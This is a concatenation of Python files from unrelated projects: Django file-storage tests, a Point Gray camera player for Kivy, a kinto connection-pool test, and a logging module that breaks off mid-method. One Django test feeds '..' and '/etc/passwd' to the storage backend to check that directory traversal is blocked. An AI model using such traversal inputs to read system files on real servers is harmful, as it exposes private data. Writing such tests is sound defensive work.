f = self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), set(['storage_dir_1']))
self.assertEqual(set(files),
set(['storage_test_1', 'storage_test_2']))
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case),
temp_storage.path(mixed_case))
temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise OSError(errno.EEXIST, 'simulated EEXIST')
elif path == os.path.join(self.temp_dir, 'error'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file',
ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file',
ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Check that OSErrors aside from EEXIST are still raised.
self.assertRaises(OSError,
self.storage.save, 'error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise OSError(errno.ENOENT, 'simulated ENOENT')
elif path == os.path.join(self.temp_dir, 'error.file'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('raced.file'))
# Check that OSErrors aside from ENOENT are still raised.
self.storage.save('error.file', ContentFile('delete with error'))
self.assertRaises(OSError, self.storage.delete, 'error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behaviour when file.chunks() raises an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
class CustomStorage(FileSystemStorage):
def get_available_name(self, name):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class UnicodeFileNameTests(unittest.TestCase):
def test_unicode_file_names(self):
"""
Regression test for #8156: files with unicode names. The exact encoding of
the repr doesn't matter; it just shouldn't return a unicode object.
"""
uf = UploadedFile(name='¿Cómo?', content_type='text')
self.assertEqual(type(uf.__repr__()), str)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(SlowFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
name = self.save_file('conflict')
self.thread.join()
self.assertTrue(self.storage.exists('conflict'))
self.assertTrue(self.storage.exists('conflict_1'))
self.storage.delete('conflict')
self.storage.delete('conflict_1')
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
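# With the 0o027 umask set in setUp(), the expected default mode above is
# 0o666 & ~0o027 == 0o640 (owner read/write, group read, no access for others).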
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test_1')))
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test_1')))
class DimensionClosingBug(unittest.TestCase):
"""
Test that get_image_dimensions() properly closes files (#8817)
"""
@unittest.skipUnless(Image, "Pillow/PIL not installed")
def test_not_closing_of_files(self):
"""
Open files passed into get_image_dimensions() should stay open.
"""
empty_io = BytesIO()
try:
get_image_dimensions(empty_io)
finally:
self.assertTrue(not empty_io.closed)
@unittest.skipUnless(Image, "Pillow/PIL not installed")
def test_closing_of_filenames(self):
"""
get_image_dimensions() called with a filename should close the file.
"""
# We need to inject a modified open() builtin into the images module
# that checks if the file was closed properly if the function is
# called with a filename instead of a file object.
# get_image_dimensions will call our catching_open instead of the
# regular builtin one.
class FileWrapper(object):
_closed = []
def __init__(self, f):
self.f = f
def __getattr__(self, name):
return getattr(self.f, name)
def close(self):
self._closed.append(True)
self.f.close()
def catching_open(*args):
return FileWrapper(open(*args))
from django.core.files import images
images.open = catching_open
try:
get_image_dimensions(os.path.join(os.path.dirname(upath(__file__)), "test1.png"))
finally:
del images.open
self.assertTrue(FileWrapper._closed)
class InconsistentGetImageDimensionsBug(unittest.TestCase):
"""
Test that get_image_dimensions() works properly after various calls
using a file handler (#11158)
"""
@unittest.skipUnless(Image, "Pillow/PIL not installed")
def test_multiple_calls(self):
"""
Multiple calls of get_image_dimensions() should return the same size.
"""
from django.core.files.images import ImageFile
img_path = os.path.join(os.path.dirname(upath(__file__)), "test.png")
image = ImageFile(open(img_path, 'rb'))
image_pil = Image.open(img_path)
size_1, size_2 = get_image_dimensions(image), get_image_dimensions(image)
self.assertEqual(image_pil.size, size_1)
self.assertEqual(size_1, size_2)
@unittest.skipUnless(Image, "Pillow/PIL not installed")
def test_bug_19457(self):
"""
Regression test for #19457
get_image_dimensions fails on some pngs, while Image.size works fine on them
"""
img_path = os.path.join(os.path.dirname(upath(__file__)), "magic.png")
try:
size = get_image_dimensions(img_path)
except zlib.error:
self.fail("Exception raised from get_image_dimensions().")
self.assertEqual(size, Image.open(img_path).size)
class ContentFileTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_file_default_name(self):
self.assertEqual(ContentFile(b"content").name, None)
def test_content_file_custom_name(self):
"""
Test that the constructor of ContentFile accepts 'name' (#16590).
"""
name = "I can have a name too!"
self.assertEqual(ContentFile(b"content", name=name).name, name)
def test_content_file_input_type(self):
"""
Test that ContentFile can accept both bytes and unicode and that the
retrieved content is of the same type.
"""
self.assertIsInstance(ContentFile(b"content").read(), bytes)
if six.PY3:
self.assertIsInstance(ContentFile("español").read(), six.text_type)
else:
self.assertIsInstance(ContentFile("español").read(), bytes)
def test_content_saving(self):
"""
Test that ContentFile can be saved correctly with the filesystem storage,
whether it was initialized with bytes or unicode content"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
class NoNameFileTestCase(unittest.TestCase):
"""
Other examples of unnamed files may be tempfile.SpooledTemporaryFile or
urllib.urlopen()
"""
def test_noname_file_default_name(self):
self.assertEqual(File(BytesIO(b'A file with no name')).name, None)
def test_noname_file_get_size(self):
self.assertEqual(File(BytesIO(b'A file with no name')).size, 19)
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
urls = 'file_storage.urls'
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file-like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
__init__.py
"""PTGray based player
======================
This player can play Point Gray ethernet cameras using :mod:`pyflycap2`.
"""
from threading import Thread
from time import perf_counter as clock
from functools import partial
import time
from queue import Queue
from os.path import splitext, join, exists, isdir, abspath, dirname
from ffpyplayer.pic import Image
from kivy.clock import Clock
from kivy.properties import (
NumericProperty, ReferenceListProperty,
ObjectProperty, ListProperty, StringProperty, BooleanProperty,
DictProperty, AliasProperty, OptionProperty, ConfigParserProperty)
from kivy.uix.boxlayout import BoxLayout
from kivy.logger import Logger
from kivy.lang import Builder
from cpl_media.player import BasePlayer, VideoMetadata
from cpl_media import error_guard
try:
from pyflycap2.interface import GUI, Camera, CameraContext
except ImportError as err:
GUI = Camera = CameraContext = None
Logger.debug('cpl_media: Could not import pyflycap2: {}'.format(err))
__all__ = ('PTGrayPlayer', 'PTGraySettingsWidget')
class PTGrayPlayer(BasePlayer):
"""Wrapper for Point Gray based player.
"""
_config_props_ = (
'serial', 'ip', 'cam_config_opts', 'brightness', 'exposure',
'sharpness', 'hue', 'saturation', 'gamma', 'shutter', 'gain',
'iris', 'frame_rate', 'pan', 'tilt', 'mirror')
is_available = BooleanProperty(CameraContext is not None)
"""Whether ptgray is available to play."""
serial = NumericProperty(0)
'''The serial number of the camera to open. Either :attr:`ip` or
:attr:`serial` must be provided.
'''
serials = ListProperty([])
"""The serials of all the cams available.
This may only be set by calling :meth:`ask_config`, not set directly.
"""
ip = StringProperty('')
'''The IP address of the camera to open. Either :attr:`ip` or
:attr:`serial` must be provided.
'''
ips = ListProperty([])
"""The IPs of all the cams available.
This may only be set by calling :meth:`ask_config`, not set directly.
"""
cam_config_opts = DictProperty({'fmt': 'yuv422'})
'''The configuration options used to configure the camera after opening.
These are internal and can only be set by the internal thread once
initially set by config.
'''
active_settings = ListProperty([])
"""The list of settings that the camera can control.
This may only be set by calling :meth:`ask_config`, not set directly.
"""
brightness = DictProperty({})
"""The camera options for the brightness setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
exposure = DictProperty({})
"""The camera options for the exposure setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
sharpness = DictProperty({})
"""The camera options for the sharpness setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
hue = DictProperty({})
"""The camera options for the hue setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
saturation = DictProperty({})
"""The camera options for the saturation setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
gamma = DictProperty({})
"""The camera options for the gamma setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
shutter = DictProperty({})
"""The camera options for the shutter setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
gain = DictProperty({})
"""The camera options for the gain setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
iris = DictProperty({})
"""The camera options for the iris setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
frame_rate = DictProperty({})
"""The camera options for the frame_rate setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
pan = DictProperty({})
"""The camera options for the pan setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
tilt = DictProperty({})
"""The camera options for the tilt setting.
This may only be set by calling :meth:`ask_cam_option_config`, not
set directly.
"""
mirror = BooleanProperty(False)
"""Whether the camera is mirrored. Read only.
"""
config_thread = None
"""The configuration thread.
"""
config_queue = None
"""The configuration queue.
"""
config_active_queue = ListProperty([])
"""The items currently being configured in the configuration thread.
"""
config_active = BooleanProperty(False)
"""Whether the configuration is currently active.
"""
_camera = None
ffmpeg_pix_map = {
'mono8': 'gray', 'yuv411': 'uyyvyy411', 'yuv422': 'uyvy422',
'yuv444': 'yuv444p', 'rgb8': 'rgb8', 'mono16': 'gray16le',
'rgb16': 'rgb565le', 's_mono16': 'gray16le', 's_rgb16': 'rgb565le',
'bgr': 'bgr24', 'bgru': 'bgra', 'rgb': 'rgb24', 'rgbu': 'rgba',
'bgr16': 'bgr565le', 'yuv422_jpeg': 'yuvj422p'}
"""Pixel formats supported by the camera and their :mod:`ffpyplayer`
equivalent.
"""
def __init__(self, open_thread=True, **kwargs):
self.active_settings = self.get_setting_names()
super(PTGrayPlayer, self).__init__(**kwargs)
if CameraContext is not None and open_thread:
self.start_config()
def do_serial(*largs):
self.ask_config('serial')
self.fbind('serial', do_serial)
def do_ip(*largs):
self.ask_config('serial')
self.fbind('ip', do_ip)
do_ip()
self.fbind('ip', self._update_summary)
self.fbind('serial', self._update_summary)
self._update_summary()
def _update_summary(self, *largs):
name = str(self.serial or self.ip)
self.player_summery = 'PTGray "{}"'.format(name)
def start_config(self, *largs):
"""Called by `__init__` to start the configuration thread.
"""
self.config_queue = Queue()
self.config_active_queue = []
thread = self.config_thread = Thread(
target=self.config_thread_run, name='Config thread')
thread.start()
self.ask_config('serials')
@error_guard
def stop_config(self, *largs, join=False):
"""Stops the configuration thread.
"""
self.ask_config('eof', ignore_play=True)
if join and self.config_thread:
self.config_thread.join()
self.config_thread = None
@error_guard
def ask_config(self, item, ignore_play=False):
"""Asks to read the config values of the item. E.g. ``'serials'``
for the list of serials or ``'gui'`` to show the PTGray GUI to the
user.
:param item: The request to send.
:param ignore_play: Whether to send it even if the camera is playing.
"""
if not ignore_play and self.play_state != 'none':
raise TypeError('Cannot configure while playing')
queue = self.config_queue
if queue is not None:
self.config_active = True
if item != 'eof':
# XXX: really strange bug, but somehow if this is set here when
# we call stop_all and we join, it blocks forever on setting
# can_play. Blocking only happens when kv binds to can_play.
# Makes no sense as it's all from the same thread???
self.can_play = False
self.config_active_queue.append(item)
queue.put(item)
def ask_cam_option_config(self, setting, name, value):
"""Asks to set the setting of the camera to a specific value.
:param setting: The setting, e.g. ``"brightness"``.
:param name: How to set it, e.g. ``"value"`` to set the value or
``'one push'`` to auto configure it.
:param value: The value to use to set it to.
"""
if not name or getattr(self, setting)[name] != value:
self.ask_config(
('option', (setting, name, value)), ignore_play=True)
def finish_ask_config(self, item, *largs, **kwargs):
"""Called in the kivy thread automatically after the camera
has been re-configured.
"""
if isinstance(item, tuple) and item[0] == 'option':
setting, _, _ = item[1]
getattr(self, setting).update(kwargs['values'])
set_rate = setting in ('frame_rate', 'metadata_play_used')
else:
for k, v in kwargs.items():
setattr(self, k, v)
set_rate = 'frame_rate' in kwargs or 'metadata_play_used' in kwargs
self.active_settings = self.get_active_settings()
if set_rate:
fmt, w, h, r = self.metadata_play_used
if 'max' in self.frame_rate:
r = max(r, self.frame_rate['max'])
self.metadata_play_used = VideoMetadata(fmt, w, h, r)
@error_guard
def _remove_config_item(self, item, *largs):
self.config_active_queue.remove(item)
if not self.config_active_queue:
self.config_active = False
self.can_play = True
def get_active_settings(self):
"""List of settings supported by the camera.
"""
settings = []
for setting in self.get_setting_names():
if getattr(self, setting).get('present', False):
settings.append(setting)
return list(sorted(settings))
def get_setting_names(self):
"""List of all settings potentially supported by a camera.
"""
return list(sorted((
'brightness', 'exposure', 'sharpness', 'hue', 'saturation',
'gamma', 'shutter', 'gain', 'iris', 'frame_rate', 'pan', 'tilt')))
def read_cam_option_config(self, setting, cam):
"""Reads the setting from the camera.
Called from the internal configuration thread.
"""
options = {}
mn, mx = cam.get_cam_abs_setting_range(setting)
options['min'], options['max'] = mn, mx
options['value'] = cam.get_cam_abs_setting_value(setting)
options.update(cam.get_cam_setting_option_values(setting))
return options
def write_cam_option_config(self, setting, cam, name, value):
"""Writes the setting to the camera.
Called from the internal configuration thread.
"""
if name == 'value':
cam.set_cam_abs_setting_value(setting, value)
else:
cam.set_cam_setting_option_values(setting, **{name: value})
if name == 'one_push' and value:
while cam.get_cam_setting_option_values(setting)['one_push']:
time.sleep(.2)
def write_cam_options_config(self, cam):
"""Writes all the settings as provided as properties of this instance
to the camera.
Called from the internal configuration thread.
"""
for setting in self.get_setting_names():
settings = getattr(self, setting)
cam.set_cam_setting_option_values(
setting, abs=settings.get('abs', None),
controllable=settings.get('controllable', None),
auto=settings.get('auto', None)
)
settings_read = cam.get_cam_setting_option_values(setting)
if settings_read['controllable'] and not settings_read['auto']:
if settings_read['abs'] and 'value' in settings:
cam.set_cam_abs_setting_value(setting, settings['value'])
elif not settings_read['abs'] and 'relative_value' in settings:
cam.set_cam_setting_option_values(
setting, relative_value=settings['relative_value'])
if cam.get_horizontal_mirror()[0]:
cam.set_horizontal_mirror(self.mirror)
def read_cam_options_config(self, cam):
"""Reads all the settings of this instance
to the camera.
Called from the internal configuration thread.
"""
for setting in self.get_setting_names():
Clock.schedule_once(partial(
self.finish_ask_config, None,
**{setting: self.read_cam_option_config(setting, cam)}))
if cam.get_horizontal_mirror()[0]:
Clock.schedule_once(partial(
self.finish_ask_config, None,
mirror=cam.get_horizontal_mirror()[1]))
def write_gige_opts(self, c, opts):
"""Writes the GIGE setting to the camera.
Called from the internal configuration thread.
"""
c.set_gige_mode(opts['mode'])
c.set_drop_mode(opts['drop'])
c.set_gige_config(opts['offset_x'], opts['offset_y'], opts['width'],
opts['height'], opts['fmt'])
c.set_gige_packet_config(opts['resend'], opts['timeout'],
opts['timeout_retries'])
c.set_gige_binning(opts['horizontal'], opts['vertical'])
def read_gige_opts(self, c):
"""Reads the GIGE setting from the camera.
Called from the internal configuration thread.
"""
opts = self.cam_config_opts
opts['drop'] = c.get_drop_mode()
opts.update(c.get_gige_config())
opts['mode'] = c.get_gige_mode()
opts.update(c.get_gige_packet_config())
opts['horizontal'], opts['vertical'] = c.get_gige_binning()
def config_thread_run(self):
"""The function run by the configuration thread.
"""
queue = self.config_queue
cc = CameraContext()
while True:
item = queue.get()
try:
if item == 'eof':
return
                ip = ''
                serial = 0
                c = None
                do_serial = False
if item == 'serials':
cc.rescan_bus()
cams = cc.get_gige_cams()
old_serial = serial = self.serial
old_ip = ip = self.ip
ips = ['.'.join(map(str, Camera(serial=s).ip))
for s in cams]
if cams:
if serial not in cams and ip not in ips:
serial = 0
ip = ''
elif serial in cams:
ip = ips[cams.index(serial)]
else:
serial = cams[ips.index(ip)]
Clock.schedule_once(partial(
self.finish_ask_config, item, serials=cams,
serial=serial, ips=ips, ip=ip))
if serial:
c = Camera(serial=serial)
c.connect()
if old_serial == serial or old_ip == ip:
self.write_gige_opts(c, self.cam_config_opts)
self.write_cam_options_config(c)
self.read_gige_opts(c)
self.read_cam_options_config(c)
if self.cam_config_opts['fmt'] not in \
self.ffmpeg_pix_map or \
self.cam_config_opts['fmt'] == 'yuv411':
self.cam_config_opts['fmt'] = 'rgb'
self.write_gige_opts(c, self.cam_config_opts)
c.disconnect()
c = None
elif item == 'serial':
do_serial = True
elif item == 'gui':
gui = GUI()
gui.show_selection()
do_serial = True # read possibly updated config
elif c or self._camera:
cam = c or self._camera
if isinstance(item, tuple) and item[0] == 'mirror':
if cam.get_horizontal_mirror()[0]:
cam.set_horizontal_mirror(item[1])
Clock.schedule_once(partial(
self.finish_ask_config, item,
mirror=cam.get_horizontal_mirror()[1]))
elif isinstance(item, tuple) and item[0] == 'option':
_, (setting, name, value) = item
if name:
self.write_cam_option_config(
setting, cam, name, value)
Clock.schedule_once(partial(
self.finish_ask_config, item,
values=self.read_cam_option_config(setting, cam)))
if do_serial:
_ip = ip = self.ip
serial = self.serial
if serial or ip:
if _ip:
_ip = list(map(int, _ip.split('.')))
c = Camera(serial=serial or None, ip=_ip or None)
serial = c.serial
ip = '.'.join(map(str, c.ip))
c.connect()
self.read_gige_opts(c)
self.read_cam_options_config(c)
if self.cam_config_opts['fmt'] not in \
self.ffmpeg_pix_map or \
self.cam_config_opts['fmt'] == 'yuv411':
self.cam_config_opts['fmt'] = 'rgb'
self.write_gige_opts(c, self.cam_config_opts)
c.disconnect()
c = None
if serial or ip:
opts = self.cam_config_opts
if opts['fmt'] not in self.ffmpeg_pix_map:
raise Exception('Pixel format {} cannot be converted'.
format(opts['fmt']))
if opts['fmt'] == 'yuv411':
raise ValueError('yuv411 is not currently supported')
metadata = VideoMetadata(
self.ffmpeg_pix_map[opts['fmt']], opts['width'],
opts['height'], 30.0)
Clock.schedule_once(partial(
self.finish_ask_config, item, metadata_play=metadata,
metadata_play_used=metadata, serial=serial, ip=ip))
except Exception as e:
self.exception(e)
finally:
Clock.schedule_once(partial(self._remove_config_item, item))
def play_thread_run(self):
process_frame = self.process_frame
c = None
ffmpeg_fmts = self.ffmpeg_pix_map
try:
ip = list(map(int, self.ip.split('.'))) if self.ip else None
c = Camera(serial=self.serial or None, ip=ip)
c.connect()
started = False
# use_rt = self.use_real_time
count = 0
ivl_start = 0
c.start_capture()
while self.play_state != 'stopping':
try:
c.read_next_image()
except Exception as e:
self.exception(e)
continue
if not started:
ivl_start = clock()
self.setattr_in_kivy_thread('ts_play', ivl_start)
Clock.schedule_once(self.complete_start)
started = True
self._camera = c
ivl_end = clock()
if ivl_end - ivl_start >= 1.:
real_rate = count / (ivl_end - ivl_start)
self.setattr_in_kivy_thread('real_rate', real_rate)
count = 0
ivl_start = ivl_end
count += 1
self.increment_in_kivy_thread('frames_played')
image = c.get_current_image()
pix_fmt = image['pix_fmt']
if pix_fmt not in ffmpeg_fmts:
raise Exception('Pixel format {} cannot be converted'.
format(pix_fmt))
ff_fmt = ffmpeg_fmts[pix_fmt]
if ff_fmt == 'yuv444p':
buff = image['buffer']
img = Image(
plane_buffers=[buff[1::3], buff[0::3], buff[2::3]],
pix_fmt=ff_fmt, size=(image['cols'], image['rows']))
elif pix_fmt == 'yuv411':
raise ValueError('yuv411 is not currently supported')
else:
img = Image(
plane_buffers=[image['buffer']], pix_fmt=ff_fmt,
size=(image['cols'], image['rows']))
process_frame(img, {'t': ivl_end})
except Exception as e:
self.exception(e)
finally:
self._camera = None
try:
c.disconnect()
finally:
Clock.schedule_once(self.complete_stop)
def stop_all(self, join=False):
self.stop_config(join=join)
super(PTGrayPlayer, self).stop_all(join=join)
class PTGraySettingsWidget(BoxLayout):
"""Settings widget for :class:`PTGrayPlayer`.
"""
settings_last = ''
"""The last name of the setting the GUI currently controls (i.e. one
of :meth:`PTGrayPlayer.get_active_settings`).
"""
opt_settings = DictProperty({})
"""The values for the settings currently being controlled in the GUI.
"""
player: PTGrayPlayer = None
"""The player.
"""
def __init__(self, player=None, **kwargs):
if player is None:
player = PTGrayPlayer()
self.player = player
super(PTGraySettingsWidget, self).__init__(**kwargs)
def _track_setting(self, *largs):
self.opt_settings = getattr(self.player, self.settings_last)
def bind_pt_setting(self, setting):
"""Tracks the setting currently selected in the GUI and auto-updates
when it changes.
"""
if self.settings_last:
self.player.funbind(self.settings_last, self._track_setting)
self.settings_last = ''
self.opt_settings = {}
if setting:
self.settings_last = setting
self.player.fbind(setting, self._track_setting)
self._track_setting()
Builder.load_file(join(dirname(__file__), 'ptgray_player.kv'))
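# Illustrative sketch (not part of the original module): how work items reach the
# configuration thread consumed by PTGrayPlayer.config_thread_run above. The item formats
# ('serials', ('option', (setting, name, value)), 'eof') come from that method; creating
# the player outside a running Kivy app is an assumption, so the calls are left commented.
#
# player = PTGrayPlayer()
# player.config_queue.put('serials')                            # rescan the bus for cameras
# player.config_queue.put(('option', ('gain', 'value', 3.0)))   # write one camera setting
# player.config_queue.put('eof')                                # ask the config thread to exit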
|
test_storage_pool.py
|
import time
import threading
import unittest
from pyramid import testing
from kinto.core.testing import skip_if_no_postgresql
@skip_if_no_postgresql
class QueuePoolWithMaxBacklogTest(unittest.TestCase):
def setUp(self):
from kinto.core.storage.postgresql.client import create_from_config
self.connections = []
self.errors = []
config = testing.setUp(settings={
'pooltest_url': 'sqlite:///:memory:',
'pooltest_pool_size': 2,
'pooltest_pool_timeout': 1,
'pooltest_max_backlog': 2,
'pooltest_max_overflow': 1,
})
# Create an engine with known pool parameters.
# Use create_from_config() to make sure it is used by default
# and handles parameters.
client = create_from_config(config, prefix='pooltest_')
session = client.session_factory()
self.engine = session.get_bind()
def take_connection(self):
try:
self.connections.append(self.engine.connect())
except Exception as e:
self.errors.append(e)
def exhaust_pool(self):
# The size of the pool is two, so we can take
# two connections right away without any error.
self.take_connection()
self.take_connection()
# The pool allows an overflow of 1, so we can
# take another, ephemeral connection without any error.
self.take_connection()
self.assertEquals(len(self.connections), 3)
self.assertEquals(len(self.errors), 0)
def test_max_backlog_fails_when_reached(self):
self.exhaust_pool()
# The pool allows a backlog of 2, so we can
# spawn two threads that will block waiting for a connection.
thread1 = threading.Thread(target=self.take_connection)
thread1.start()
thread2 = threading.Thread(target=self.take_connection)
thread2.start()
self.assertEquals(len(self.connections), 3)
self.assertEquals(len(self.errors), 0)
# The pool is now exhausted and at maximum backlog.
# Trying to take another connection fails immediately.
t1 = time.time()
self.take_connection()
t2 = time.time()
self.assertEquals(len(self.connections), 3)
# This checks that it failed immediately rather than timing out.
self.assertTrue(t2 - t1 < 1.1)
self.assertTrue(len(self.errors) >= 1)
# And eventually, the blocked threads will time out.
thread1.join()
thread2.join()
self.assertEquals(len(self.connections), 3)
self.assertEquals(len(self.errors), 3)
def test_recreates_reinstantiate_with_same_pool_class(self):
from kinto.core.storage.postgresql.pool import QueuePoolWithMaxBacklog
pool = QueuePoolWithMaxBacklog(None, max_backlog=2, pool_size=2)
other = pool.recreate()
self.assertEqual(pool._pool.__class__, other._pool.__class__)
self.assertEqual(other._pool.max_backlog, 2)
|
log.py
|
from logging import Handler
from queue import Queue
from threading import Thread
import logging.config
import logging
import asyncio
import datetime
import yaml
import sys
import os
from git import Repo
from functools import partial, wraps
from pythonjsonlogger import jsonlogger
RED = '\033[91m'
BLUE = '\033[94m'
BOLD = '\033[1m'
END = '\033[0m'
_BRANCH_NAME = None
http_pings_logs_disabled = True
def get_current_working_repo():
branch_name = None
current_tag = None
try:
repo = Repo(os.getcwd())
branch = repo.active_branch
branch_name = branch.name
tags = repo.tags
if tags and isinstance(tags, list):
current_tag = tags[-1].name
except:
pass
return (branch_name, current_tag)
def http_ping_filter(record):
if "GET /ping/" in record.getMessage():
return 0
return 1
class LogFormatHelper:
LogFormat = '%a %l %u %t "%r" %s %b %D "%{Referrer}i" "%{User-Agent}i" %{X-Request-ID}o'
class CustomTimeLoggingFormatter(logging.Formatter):
def formatTime(self, record, datefmt=None): # noqa
"""
Overrides formatTime method to use datetime module instead of time module
to display time in microseconds. Time module by default does not resolve
time to microseconds.
"""
record.branchname = _BRANCH_NAME
if datefmt:
s = datetime.datetime.now().strftime(datefmt)
else:
t = datetime.datetime.now().strftime(self.default_time_format)
s = self.default_msec_format % (t, record.msecs)
return s
class CustomJsonFormatter(jsonlogger.JsonFormatter):
def __init__(self, *args, **kwargs):
self.extrad = kwargs.pop('extrad', {})
super().__init__(*args, **kwargs)
def add_fields(self, log_record, record, message_dict):
message_dict.update(self.extrad)
record.branchname = _BRANCH_NAME
